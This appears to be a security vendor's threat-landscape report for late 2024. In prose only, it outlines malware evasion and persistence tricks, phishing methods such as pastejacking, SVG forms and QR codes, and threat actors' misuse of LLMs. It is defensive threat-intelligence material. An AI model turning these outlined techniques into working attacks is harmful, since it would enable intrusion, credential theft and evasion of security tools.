Threat Landscape Overview
This section provides more details about the previously briefly described state of the changes to the threat landscape observed over the past months.
Tracked Malware Families
One of the foundational responsibilities of CTI and SOC teams lies in the ongoing surveillance of cybersecurity events in the world. This entails more than just tracking existing malware families and their evolving tactics, techniques, and procedures – it also requires the quick identification of newly emerging threats. Our goal is to remain a step ahead of cyber adversaries, enabling proactive defenses against both known and novel threats.
Beyond merely identifying new malware variants, security teams must maintain a real-time awareness of any shifts or changes within the larger threat landscape. This is crucial because the realm of cybersecurity is continually shifting. New malware campaigns, vulnerabilities, and changes in attacker behavior are just a few of the variables that the team closely monitors. In line with our efforts to provide robust defenses, we employ two key strategies: using YARA rules for malware detection and classification, and the generation of high-quality Indicators of Compromise (IOCs) through malware configuration extraction. These strategic assets are vital tools that enhance the accuracy and efficiency of our threat detection mechanisms.
In the past three months, our threat monitoring has identified the top 10 most prevalent malware families in the wild: Lumma, QuasarRAT, Emotet, AgentTesla, XWorm, GuLoader, xRAT, Stealc, Amadey, and Cobalt Strike. Tracking these active threats enables CTI and SOC teams to adapt defenses swiftly and maintain resilience against evolving cyber risks.
The most commonly faced threat sample types
Over the past year, phishing has continued to dominate the threat landscape, with more than 70% of all submissions to our platform being URLs and emails— further underscoring the persistent and evolving nature of phishing attacks.
Windows executables account for 7.1% of submissions, followed by PDF documents at 4.1%. Other notable sample types include unknown file types, macOS executables, HTML documents, and archives. URLs also represent the majority of recursive submissions, while Word documents are more frequently submitted directly, and PDFs are more often analyzed recursively—both aligning with common phishing tactics that use links and PDF attachments to deliver malicious payloads.
These trends mirror last year’s findings, reinforcing the need for robust detection and analysis capabilities to counter the growing phishing threat.
Trends in the Threat Landscape The threat landscape continues to evolve with attackers constantly refining their techniques to bypass traditional security measures. In recent months, we have observed a surge in novel evasion methods designed to slip past defenses undetected. From the use of ZIP file concatenation to phishing campaigns leveraging corrupt Word documents, threat actors are finding increasingly creative ways to deliver malware.
Techniques such as embedding malicious code within XSLT stylesheets and implementing double-click checks to trigger payloads further highlight the sophistication of modern threats. This section explores these emerging trends, providing insights into the latest tactics employed by cyber adversaries and the implications for defenders.
Novel Evasion Techniques
From exploiting flaws in file structures to manipulating operating system features, these approaches are developed to allow attackers in the second half of 2024 to remain undetected while executing their campaigns. Below are examples of recent evasion tactics, their underlying mechanisms, and their implications for cybersecurity defenses.
ZIP File Concatenation
Threat actors have adopted the ZIP file concatenation technique to hide malicious payloads within compressed archives. This method exploits the differences in how different archive managers parse concatenated ZIP files, enabling attackers to hide their malware behind seemingly benign content.
How it works: Multiple ZIP files are concatenated by putting one after another. Depending on the parser, either the very first archive or the last archive might be visible to users. For example, while 7zip may show the actual malicious file depending on which of the concatenated ZIP files it is, Windows Explorer could do the opposite and show the benign one instead. In one experiment, this is exactly what happened, and only WinRAR revealed all files.
Example: Â In a phishing attack, a concatenated ZIP file contained a harmless PDF in one archive and a malicious executable in the other. This would allow attackers to let security scanners, which certainly use tools other than the Windows Explorer, to scan the benign file while in actuality the victim will see the malicious file in the Explorer window.
Advanced macOS Persistence
North Korean threat group BlueNoroff has developed macOS malware utilizing novel persistence mechanisms to target cryptocurrency firms. The Hidden Risk campaign employs a multi-stage infection chain and avoids detection by circumventing macOS’s App Transport Security policies.
How it works:  A notarized dropper app downloads a decoy PDF and a malicious payload in the background. The payload achieves persistence by modifying the .zshenv file, which loads during Zsh sessions. This bypasses macOS 13+ persistence detection systems.
Impact: Â The malware avoids detection by traditional tools and connects to a C2 server to execute commands, including file exfiltration and shell command execution.
Stealthy Linux Malware Using udev Rules
The sedexp malware has remained undetected for over two years on Linux systems by exploiting an undocumented persistence technique involving udev rules.
How it works:  A udev rule triggers malicious script execution whenever /dev/random is accessed, which happens at least once during system boot. The malware disguises itself as a legitimate process (kdevtmpfs) and manipulates memory to hide files containing “sedexp” from standard commands like ls and find.
Capabilities : Reverse shell creation, memory manipulation, and data exfiltration.
Phishing with Corrupted Word Documents
A novel phishing campaign exploits Microsoft Word’s file recovery feature by using intentionally corrupted documents to bypass email security filters and other security solutions. These documents recover as readable files, tricking users into scanning QR codes leading to credential-stealing phishing sites.
How it works:Â Corrupted Word files pass undetected through most antivirus solutions as they cannot be scanned. However, upon recovery, the currently observed samples display targeted branding and QR codes that redirect users to phishing sites mimicking Microsoft login pages.
Embedding Malicious Code in XSLT Stylesheets
Attackers have been observed leveraging the XSLT script processing capabilities in Microsoft XML Core Services (MSXML2) to execute malicious code as a side-effect of an XML transformation. By embedding harmful scripts within XSLT stylesheets, this technique evades traditional detection mechanisms and facilitates indirect code execution.
How it works:  The attack begins with an Excel document containing VBA macros, which deliberately triggers the transformation of an XML file. This XML file references an XSLT stylesheet that includes malicious JScript embedded within <ms:script> tags. During the transformation process, the JScript executes, effectively shifting malicious activity to MSXML2 and bypassing static analysis tools that focus on the original document.
The delivery chain follows a structured flow. The initial stage involves Excel VBA macros, which activate the XML processing. The XML file then executes the embedded JScript within the XSLT stylesheet. This JScript component interacts with the Windows Installer to download the next-stage payload. Finally, an AutoHotKey script is used to communicate with a Command and Control (C2) server for additional instructions.
This technique exhibits several notable features. At the time of its discovery, the attack achieved a low detection rate, with only 4 out of 64 engines on VirusTotal identifying it as malicious. Anti-analysis techniques further complicate detection, as AI classifiers flagged the payload as benign. The secondary payloads included capabilities such as screenshot capture, with the captured images uploaded immediately to the C2 server.
This exploitation of MSXML2’s XSLT script processing highlights how attackers innovate to abuse lesser-known features of widely used software. Defenders must broaden the scope of behavioral analysis to detect such sophisticated methods effectively.
Double-Click Check
A heavily obfuscated batch file employs a unique evasion technique that involves checking how it is executed. If the batch file determines it was launched through the command line, which often occurs in sandboxes or other analysis environments, it terminates immediately. However, if it was started by a double-click, which aligns with the behavior attackers anticipate from their victims, the file proceeds to download and execute an open-source information stealer from GitHub.
How it works:Â The batch file utilizes multiple obfuscation techniques to conceal its true purpose. One such method is the use of SomalifuscatorV2, a tool that adds additional layers of obfuscation to the code. It also incorporates a UTF-16 Byte Order Marker (BOM), which can confuse text editors. Further complexity is added through the use of ROT-24 encoding, which makes deobfuscation efforts more challenging.
The execution flow includes several sophisticated steps to ensure its effectiveness. First, the file performs anti-virtual machine checks, requiring the machine to have more than 4GB of RAM to proceed. Next, it downloads the KematianStealer PowerShell script directly from GitHub. Before executing the script, it modifies the stealer’s Command and Control (C2) URL dynamically to suit its needs.
Delivery Chain:Â The attack delivery follows a multi-step chain. Initially, the obfuscated batch file triggers MSHTA to execute additional obfuscated code. MSHTA then uses PowerShell to fetch and run the KematianStealer script. Finally, the PowerShell script interacts with Discord to exfiltrate sensitive data and establishes persistence on the compromised machine.
Notable Features:Â The file’s effectiveness is amplified by its ability to evade detection. It achieved a 0 out of 64 detection score on VirusTotal, rendering it entirely undetected by security tools at the time. Additionally, it incorporates anti-analysis measures by terminating execution unless it is launched via a double-click, thereby avoiding automated sandbox analysis.
Abusing MS Access ACCDE Files to Hide Malicious Code
An attacker–later believed to be a nation-state actor likely conducting espionage against the Pakistani navy–was found exploiting the ACCDE format of Microsoft Access. This format, a rarely monitored file type, was used to embed compiled malicious backdoors within database files. The ACCDE format obscures VBA macros by compiling them into p-code, which makes static analysis challenging.
How it works:Â When executed, the macro extracts a malicious Portable Executable (PE) file stored within a database table. The extracted file is then dropped onto the filesystem and executed. Once active, the PE file establishes a connection with a Command and Control (C2) server and waits for further instructions.
Key Features. This attack leveraged several features to enhance its stealth and effectiveness. The ACCDE file was entirely undetected, with a 0 out of 63 detection score on VirusTotal. The dropped PE file, named “MW-BLACK-Shell,” also maintained a low detection rate, with only 5 out of 75 detections. To further obscure its operation, the PE file was stored within the database as table data rather than being embedded directly in the macros. Additionally, the backdoor ensured persistence by scheduling itself to execute at specific intervals, such as daily at 9:30 AM.
Challenges for Defenders. Defending against such threats is complicated by several factors. ACCDE files are rarely used for malicious purposes, which makes them less likely to be flagged as suspicious by traditional security tools or trained employees alike. Furthermore, the hidden backdoor’s behavior can currently only be accurately observed through dynamic analysis, requiring the execution of the file to reveal its malicious payload.
This example emphasizes the need to monitor unconventional file formats and understand their potential for abuse in delivering malware.
(Ab)use of AI
The second half of 2024 has confirmed what experts long anticipated: the misuse of large-language models (LLMs) by threat actors. With their ability to produce high-quality outputs rapidly, LLMs have become a tool for attackers, allowing individuals with minimal technical knowledge to generate highly targeted and complex threats. These tools have proven to lower the barrier to entry for cybercriminals while significantly enhancing their precision and efficiency.
AI-Assisted Malware Development
Generative AI has become an enabler for crafting malicious code, with PowerShell scripts and other malware components observed in recent attacks that include artifacts of AI-generated code. For instance, a phishing campaign targeting French users employed HTML smuggling techniques to distribute password-protected ZIP archives containing neatly commented VBScript and JavaScript code.
These comments, formatted similarly to those produced by generative AI tools, clarified the functionality of the malware in a way that contrasted with typical obfuscation methods used by threat actors.
Threat actors have also been observed experimenting with Google’s Gemini AI service to generate and refine malicious code. Iranian, Chinese, North Korean, and Russian state-backed actors misused Gemini for tasks such as malware scripting, payload obfuscation, and vulnerability research.
AI in Phishing and Reconnaissance
Beyond malware development, LLMs have been instrumental in producing convincing phishing campaigns. AI-assisted tools can tailor phishing emails to specific targets, industries, or regions, increasing the success rate of these attacks. For example, phishing campaigns delivering AsyncRAT malware were identified, with emails and scripts polished to a degree likely unattainable for the average attacker without AI assistance.
Government-backed threat actors have also leveraged AI models for reconnaissance and pre-attack research. Google’s analysis of Gemini AI interactions revealed that groups like SweetSpecter (China), APT42 (Iran), and North Korean adversaries used AI to:
Search for vulnerabilities in applications and identify Log4j instances susceptible to Log4Shell exploitation.
Request information about CVE numbers and content management systems.
Generate scripts for uploading web shells using tools like sqlmap.
Conduct reconnaissance on specific industries, such as researching common content management systems used abroad or identifying targets within automotive infrastructure.
North Korean adversaries, in particular, were found using AI for job fraud schemes, crafting fake resumes and cover letters to infiltrate Western tech firms under false identities.
Advanced Social Engineering and Scripting
AI tools have also elevated social engineering campaigns. SweetSpecter used ChatGPT to brainstorm themes for phishing emails, generate variations of job recruitment messages, and develop code for sending messages programmatically. Iranian APT42 actors used Gemini to tailor phishing campaigns targeting defense personnel, leveraging AI for reconnaissance on individual experts and organizations.
Google’s report further revealed that Chinese APT actors used Gemini to conduct reconnaissance on U.S. military networks and IT service providers, as well as research advanced defense evasion techniques. Additionally, Iranian and North Korean APT groups experimented with LLMs to refine exploitation techniques, request translations of exploit documentation, and generate obfuscated VBA scripts for payload execution.
AI as a Defensive Tool
While the misuse of AI is a growing concern, these tools also provide significant advantages to defenders. Security researchers have used LLMs to quickly generate sophisticated malware samples for testing, simulate attack scenarios, and improve de-obfuscation and decompilation workflows in reverse engineering. By leveraging AI in these ways, defenders can enhance their preparedness against evolving threats.
Phishing
Phishing campaigns have evolved to exploit trust in well-known platforms and sophisticated social engineering techniques to deceive victims. Below are notable examples of how phishing attackers are innovating to steal sensitive data and compromise systems.
Facebook Malvertising Campaigns
Cybercriminals have begun leveraging Facebook’s expansive advertising network to distribute SYS01, a malware designed to steal sensitive information. Attackers use two main methods to propagate their malicious campaigns: creating fake Facebook business pages or hijacking legitimate ones.
These pages are then used to promote ads encouraging users to download fake Windows themes, pirated games, or software cracks. Victims are redirected to websites hosting ZIP archives that deliver the malware, which is capable of stealing browser cookies, saved credentials, and Facebook account details.
How it works:Â To maximize the effectiveness of their campaigns, the attackers employ several techniques. Hijacked Facebook pages are renamed to align with the themes of their malicious ads, ensuring the ads reach the pages’ existing followers and boosting credibility.
The malware also incorporates advanced evasion tactics, including DLL sideloading and PowerShell scripts, to bypass virtualized environments and antivirus tools. Once installed, the malware focuses on stealing data such as browsing history, saved credentials, and Facebook-specific information, including profile details and managed page access.
This use of Facebook’s trusted platform to reach a wide audience demonstrates how attackers exploit legitimate systems to enhance the reach of their malware campaigns. By hijacking unrelated Facebook pages, they even manage to weaponize existing follower bases to amplify the spread of their malicious activities.
Abusing GitHub
Threat actors have started using GitHub as a platform to spread information-stealing malware like Lumma Stealer. By exploiting developer trust in GitHub’s collaborative tools, attackers employ tactics such as posting fake fixes in comments or creating fraudulent issues in repositories to deceive developers into downloading malicious files.
How it works: The attackers use a variety of approaches to target unsuspecting developers. One tactic involves posting malicious comments on GitHub projects, with over 29,000 such comments observed. These comments contain links to archives hosting malware.
Another method abuses GitHub’s issue-tracking system by sending emails to users that claim to notify them of vulnerabilities. These emails direct recipients to phishing domains, such as “github-scanner[.]com,” under the guise of providing security fixes.
To further entice victims, the malware is distributed through password-protected ZIP files. Once extracted, the included executables steal credentials, browser cookies, and cryptocurrency wallets from the infected system.
Developers now face the added challenge of navigating potential threats in the comments and issues sections of their projects. It is crucial to scrutinize shared resources and links carefully before downloading or executing them to mitigate the risk of falling victim to these attacks.
Exploiting StackExchange for Targeted Attacks
Malicious Python packages were recently promoted on StackExchange forums, targeting developers working within the Solana and Raydium blockchain ecosystems. These packages, hosted on PyPI, downloaded scripts that exfiltrated sensitive information, including wallet keys and browser credentials.
Attack Details: The attackers used packages such as sol-structs  and raydium-sdk , which were crafted to appear legitimate to unsuspecting developers. To promote these packages, the threat actors posted high-quality, seemingly credible answers on StackExchange threads, directing users to the malicious resources. The impact of this attack was significant, with reported cases including an IT employee whose Solana wallet was completely drained and another victim whose private key was exposed.
This campaign demonstrates a novel evolution of package-based attacks. While typosquatting–creating malicious packages with names similar to legitimate ones–has long been a common tactic, deliberately leveraging trusted forums like StackExchange to promote harmful advice introduces a new and concerning attack vector. Developers should remain vigilant when downloading packages and critically assess recommendations, even from seemingly reliable sources.
Pastejacking: Manipulating the Clipboard
Attackers are increasingly using “pastejacking” as a deceptive method to trick users into executing malicious code by abusing the clipboard functionality. This tactic involves creating malicious websites that secretly alter the contents of a user’s clipboard, replacing copied text with harmful commands and instructing the user to paste these commands into a window that will execute them.
How it works:Â Pastejacking operates by exploiting user interactions with their clipboard. A malicious website injects harmful commands into the clipboard, replacing the content the user intended to copy. Typically, users are then instructed to press Windows + R to open the “Run” dialog, use CTRL+V to paste the altered clipboard contents, and press Enter to execute the command.
In a notable example, attackers posed as providing troubleshooting steps for installing a missing Chrome extension. They directed users to copy and paste a command, which, unbeknownst to the victims, contained malicious instructions.
Impact: The consequences of pastejacking can be severe. The malicious code, once executed, may install malware, exfiltrate sensitive data, or compromise the victim’s system. Many users remain unaware of the command’s true purpose, as they believe they are simply following legitimate troubleshooting advice.
SVG Phishing: Leveraging Scalable Vector Graphics for Attacks
Attackers are now exploiting Scalable Vector Graphics (SVG) image files in phishing campaigns to bypass traditional email security filters and deliver malicious payloads. The unique properties of SVG files make them a versatile medium for crafting deceptive attacks.
How it works: Â Unlike traditional image formats like PNG or JPG, SVG files are instruction-based and allowed to embed scripts or HTML code directly within the file. Threat actors leverage this capability in multiple ways to deceive their victims.
One common tactic involves embedding phishing forms using the <foreignObject> element within the SVG files. These forms are designed to mimic legitimate login portals, such as those for Microsoft or Google accounts, tricking users into entering their credentials. In other cases, attackers use SVG files to include embedded JavaScript or encoded URLs that redirect victims to phishing sites automatically when the file is opened.
Examples:  In one reported case, an SVG file presented itself as a fake Excel spreadsheet. This file contained a deceptive login form that harvested user credentials and sent them to the attacker’s server. Another campaign weaponized SVG files as clickable images, luring users to download malware from remote locations.
SVG-based attacks are particularly effective because the file format is often associated with other image formats and thus perceived as harmless. Many traditional security tools fail to analyze the embedded content within SVG files, allowing attackers to bypass detection mechanisms.
DoubleClickjacking Attacks
DoubleClickjacking is an emerging variation of clickjacking that exploits the timing of mouse double-clicks to deceive users into performing unauthorized actions. This attack leverages the natural behavior of users interacting with websites, making it both subtle and effective.
Scenario: Â Victims are tricked into double-clicking on an element in a new window, such as to solve a CAPTCHA. While the first click interacts with the intended interface, it also immediately closes the window so that the second click triggers an action on a button or link at the same spot in the window behind it. These elements can initiate actions such as granting OAuth permissions, approving multi-factor authentication (MFA) requests, or performing other sensitive and authenticated operations.
What makes this technique particularly dangerous is its ability to bypass traditional clickjacking defenses. Unlike classic clickjacking, DoubleClickjacking does not rely on iframes or cross-site cookies, which are the focus of most protective measures. This allows the attack to slip through defenses that are designed to block older methods.
Demonstrations of this attack have shown its potential to compromise accounts on popular platforms like Shopify, Slack, and Salesforce. By exploiting this vulnerability, attackers can gain unauthorized access to sensitive accounts and resources.
Targeting Developers with Fake Job Offers
The Contagious Interview campaign has emerged as a sophisticated attack targeting software developers by luring them with fake job offers. The ultimate goal of this campaign is to deliver malware, such as OtterCookie, to steal sensitive data and compromise systems.
Delivery:Â The delivery of OtterCookie relies on loaders embedded within Node.js projects, npm packages, and applications built using frameworks like Qt or Electron. Once executed, the malware exfiltrates sensitive information, including cryptocurrency wallet keys and clipboard contents, by utilizing secure WebSocket communications to avoid detection.
This campaign exploits the workflow of developers who may unknowingly execute malicious scripts while testing or working on projects linked to these fraudulent job offers. By embedding malware into development environments and disguising it within seemingly legitimate projects, attackers ensure a higher likelihood of execution by their targets.
QR Code Phishing (Quishing)
QR codes have become an increasingly popular tool for phishing campaigns, with attackers leveraging their ability to encode URLs in ways that evade detection and manipulate unsuspecting victims. Their versatility and widespread use make them an attractive vector for delivering malicious links.
How it works: Â One tactic involves the use of cropped or incomplete QR codes. Attackers design these QR codes to exploit differences in how mobile devices and security tools interpret them. While security tools often fail to extract the malicious phishing URL from such QR codes, victims scanning them with their phones are seamlessly directed to the intended phishing site. This approach allows attackers to bypass automated detection mechanisms while still effectively targeting end users.
In another method, attackers create QR codes using HTML or ASCII symbols to render them directly on a webpage. These QR codes are clearly visible to victims but may escape detection by security tools that focus on image-based QR codes. By embedding the QR code in a way that bypasses conventional scanning techniques, attackers increase their chances of success.
These techniques highlight the importance of treating QR codes with caution, especially those received through email or displayed on untrusted websites. Scanning unfamiliar QR codes without verifying their source can expose users to phishing sites and other security risks. Staying vigilant and employing additional security measures is essential to mitigating the threats posed by this emerging attack vector.
Abuse of Open Redirection Vulnerabilities
Attackers are increasingly exploiting open redirection vulnerabilities to mask the delivery of malicious payloads. By chaining multiple trusted domains, they create complex redirection paths that bypass detection tools and lead victims to phishing sites or malware.
Example:  In one documented attack, the redirection chain utilized a series of trusted platforms, including YouTube, Google Meet, Google Search, Google AMP, an URL shortener, and a website builder. Each step in the chain relied on the credibility of the preceding domain to reduce suspicion among users and evade detection by automated tools. The final destination was a site hosting the malicious payload, but the intermediate steps effectively concealed the attack’s true intent.
This tactic is effective because many security tools prioritize analyzing the final destination URL. If just one step in the redirection chain is incorrectly parsed or not fully executed during analysis, the malicious site can evade detection. Additionally, the use of trusted domains, such as Google’s platforms, provides an air of legitimacy that makes it harder for both automated systems and users to identify the threat.
The impact of these attacks is significant, as they are used to deliver phishing pages, credential-stealing forms, and malware. Open redirection chains allow attackers to circumvent URL-based filtering systems and reputation analysis, making them a particularly stealthy and effective method for delivering malicious content.
Security tools that rely on pre-processing and scanning URLs must account for the complexity of open redirection chains. Determining the true nature of a URL often requires iterating through all intermediate steps until the final payload is revealed, emphasizing the need for more advanced detection capabilities.
Conclusion
In the second half of 2024, cybercriminals continued to develop new ways to avoid detection and increase the damage caused by their attacks. Attackers are using inventive techniques to hide malware, such as exploiting quirks in archive file formats and misusing features in Microsoft Office. A slowly growing trend is the use of AI and large language models by attackers, making it easier for them to create targeted and persuasive campaigns.
Phishing continues to be a top way that attackers gain access, as they take advantage of the trust people have in sites like Facebook, GitHub and LinkedIn to trick victims. More advanced social engineering tactics are being used, such as malicious advertising, QR code phishing, and attacks leveraging SVG files. Data breaches remain a serious problem, exposing billions of sensitive records and costing affected companies huge financial losses.
The combination of all these threats highlights the importance of a sophisticated security solution. Many of the techniques outlined are designed to evade static analysis, warranting the use of dynamic analysis methods like evasion-resistant sandboxes to gain insights into the malicious nature of the techniques.
